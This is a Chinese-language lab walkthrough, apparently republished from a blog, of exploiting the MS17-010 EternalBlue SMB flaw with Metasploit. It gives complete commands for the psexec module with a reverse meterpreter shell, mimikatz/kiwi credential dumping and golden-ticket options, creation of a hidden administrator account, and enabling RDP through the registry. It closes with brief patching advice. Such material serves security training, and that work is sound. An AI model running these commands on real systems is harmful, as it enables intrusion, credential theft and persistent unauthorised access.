MS17-010永恒之蓝漏洞利用

MS17-010永恒之蓝漏洞利用

原理

永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。SMB服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互通有无。漏洞原理的深入研究,请参考:(https://blog.csdn.net/luoshenwei3533/article/details/82931999)

实验前准备

攻击ip:192.168.200.130
被攻击ip:192.168.200.101  开启了445端口(默认是开启的),未打漏洞补丁,关闭防火墙
二者能够相互ping通

步骤

1、启动MSF

msfconsole

undefined

2、ms17_010模块使用过程

search ms17_010                              查找相应的漏洞模块
​
use exploit/windows/smb/ms17_010_psexec      加载模块
​
set RHOSTS 192.168.200.101                   设置攻击目标
​
check                                        进行检测,确认是否存在ms17_010漏洞
​
set payload windows/meterpreter/reverse_tcp  加载payload
​
set LHOST 192.168.200.130                    设置本地IP
​
show options                                 查看模块相关参数
​
run                                          攻击

(1)查找相应的漏洞模块

MS17-010永恒之蓝漏洞利用

(2)加载模块并设置目标

我们这里使用第1个,即”exploit/windows/smb/ms17_010_psexec”模块,并设置RHOSTS为被攻击IP

MS17-010永恒之蓝漏洞利用

使用check命令检测一下是否存在ms17_010漏洞。检测时,会自动加载auxiliary/scanner/smb/smb_ms17_010模块,可以看到,被攻击目标是存在这个漏洞的。

(3)加载payload

这里使用windows/meterpreter/reverse_tcp作为攻击payload。

MS17-010永恒之蓝漏洞利用

攻击前,再用show options命令检查一下设置是否正确。

MS17-010永恒之蓝漏洞利用

(4)攻击

3、漏洞利用

(1) 查看系统信息sysinfo

MS17-010永恒之蓝漏洞利用

(2) 查看当前用户的权限getuid

MS17-010永恒之蓝漏洞利用

(3))获取目标系统权限shell

MS17-010永恒之蓝漏洞利用

(4)获取目标主机用户以及密码,需要使用system权限,如果是在administrator下,直接使用 getsystem 即可

load kiwi  加载kiwi模块
help kiwi  查看kiwi模块帮助

MS17-010永恒之蓝漏洞利用

MS17-010永恒之蓝漏洞利用

creds_all 查看用户,密码,密码对应hash值等

MS17-010永恒之蓝漏洞利用

kiwi具体命令

load kiwi
​
creds_all:列举所有凭据
creds_kerberos:列举所有kerberos凭据
creds_msv:列举所有msv凭据
creds_ssp:列举所有ssp凭据
creds_tspkg:列举所有tspkg凭据
creds_wdigest:列举所有wdigest凭据
dcsync:通过DCSync检索用户帐户信息
dcsync_ntlm:通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create:创建黄金票据
kerberos_ticket_list:列举kerberos票据
kerberos_ticket_purge:清除kerberos票据
kerberos_ticket_use:使用kerberos票据
kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam:dump出lsa的SAM
lsa_dump_secrets:dump出lsa的密文
password_change:修改密码
wifi_list:列出当前用户的wifi配置文件
wifi_list_shared:列出共享wifi配置文件/编码

(5)开启目标远程

开启目标远程,并创建一个test帐户

方法一

meterpreter > run post/windows/manage/enable_rdp username="test" password="123456"

验证

MS17-010永恒之蓝漏洞利用

方法二

shell    net user lfn 123456 /add                      创建用户
net localgroup administrators lfn /add    添加管理员权限

ps如果目标机器没有开启远程桌面服务,使用注册表进行打开

C:\Windows\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

使用刚才创建的用户和密码进行远程,进行远程控制。

rdesktop 192.168.200.101 -u test -p 123456

MS17-010永恒之蓝漏洞利用

防护措施

  • 关闭445等高危端口
  • 配置防火墙,安装防护软件
  • 安装补丁

Original: https://www.cnblogs.com/ggc-gyx/p/ms17_010.html
Author: ʚɞ无恙
Title: MS17-010永恒之蓝漏洞利用

原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/609753/

转载文章受原作者版权保护。转载请注明原作者出处!

(0)

大家都在看

  • QT资料大全

    本文并非原创,摘自: 一去丶二三里 ,感谢大佬的总结 http://blog.csdn.net/liang19890820 推荐另外一个大神的QT总结,受益匪浅啊 https://…

    Linux 2023年6月13日
    075
  • 致远 OA 组合 getshell

    测试版本为: 致远 A8-V5 协同管理软件 V6.1SP2 1.获取cookie信息 2….

    Linux 2023年5月28日
    0314
  • [转帖]shell 学习之for语句

    404. 抱歉,您访问的资源不存在。 可能是网址有误,或者对应的内容被删除,或者处于私有状态。 代码改变世界,联系邮箱 contact@cnblogs.com 园子的商业化努力-困…

    Linux 2023年5月28日
    095
  • POJ1322Chocolate–概论DP

    每次从包装中取出一块巧克力并放在桌子上。如果桌子上有两个相同颜色的巧克力,则将这两个丢掉。如果包中有C种颜色的巧克力(颜色均匀分布),从包装中取出N个巧克力后,桌子上确实有M个巧克…

    Linux 2023年6月7日
    0118
  • linux free命令available小于free值

    问题:前段时间在做服务器巡检时发现系统可用内存值小于空闲内存值 分析:查询网上各种资料,都说的是 available=free + buff/cache 这样一个大致计算方式,按这…

    Linux 2023年6月14日
    0170
  • 关于熵,条件熵,交叉熵等的介绍

    参考:《数学之美》一文搞懂交叉熵在机器学习中的使用,透彻理解交叉熵背后的直觉详解机器学习中的熵、条件熵、相对熵和交叉熵常用的分类问题中的损失函数 1.信息量与信息熵 香农在他著名的…

    Linux 2023年6月13日
    095
  • Python中的对象引用、浅拷贝与深拷贝

    最近项目中遇到一个Python浅拷贝机制引起的bug,由于对于Python中对象引用、赋值、浅拷贝/深拷贝机制没有足够的认识,导致调试了很久才发现问题,这里简单记录一下相关概念。 …

    Linux 2023年6月6日
    084
  • IDM 下载器的安装和使用

    下载安装 为大家提供免注册版本:IDM下载器 – Dominic 的蓝奏云分享 下载解压之后,双击第一个文件进行安装 之后一路选择”Next”即…

    Linux 2023年6月8日
    0148
  • CTF中的一些图形密码

    1.传统猪圈密码 猪圈密码又称为亦称朱高密码、共济会暗号、共济会密码或共济会员密码;是一种以特定符号来替换字母的加密方式在线解密网址:http://moersima.00cha.n…

    Linux 2023年6月6日
    0121
  • Postman 正确使用姿势

    前言: 请各大网友尊重本人原创知识分享,谨记本人博客:南国以南i 简介: Postman是一个接口测试工具,在做接口测试的时候,Postman相当于一个客户端,它可以模拟用户发起的…

    Linux 2023年6月14日
    079
  • Redis-firewall使用命令

    Redis-firewall使用命令 一、iptables防火墙 1、基本操作 查看防火墙状态 service iptables status 停止防火墙 service ipta…

    Linux 2023年6月14日
    0101
  • podman无根用户基本设置和使用

    在允许没有root特权的用户运行Podman之前,管理员必须安装或构建Podman并完成以下配置 cgroup V2Linux内核功能允许用户限制普通用户容器可以使用的资源,如果使…

    Linux 2023年6月13日
    089
  • SpringBoot学习笔记——Redis Template

    Springboot可以通过redis template和redis进行交互,使用方法如下 可以参考这个系列的文章: 【快学springboot】11.整合redis实现sessi…

    Linux 2023年5月28日
    0103
  • Java并发-建立线程

    一、建立新的线程 方法介绍 1、java.lang.Thread 1.0 Thread(Runnable target) 构造一个新线程,用于调用给定目标的run()方法。 voi…

    Linux 2023年6月7日
    089
  • JDK 环境变量配置

    一、环境准备 Windows10 jdk-9.0.1 二、下载合适的JDK版本,安装JDK 三、环境变量配置 1、右键桌面上”我的电脑”>>&#…

    Linux 2023年6月8日
    088
亲爱的 Coder【最近整理,可免费获取】👉 最新必读书单  | 👏 面试题下载  | 🌎 免费的AI知识星球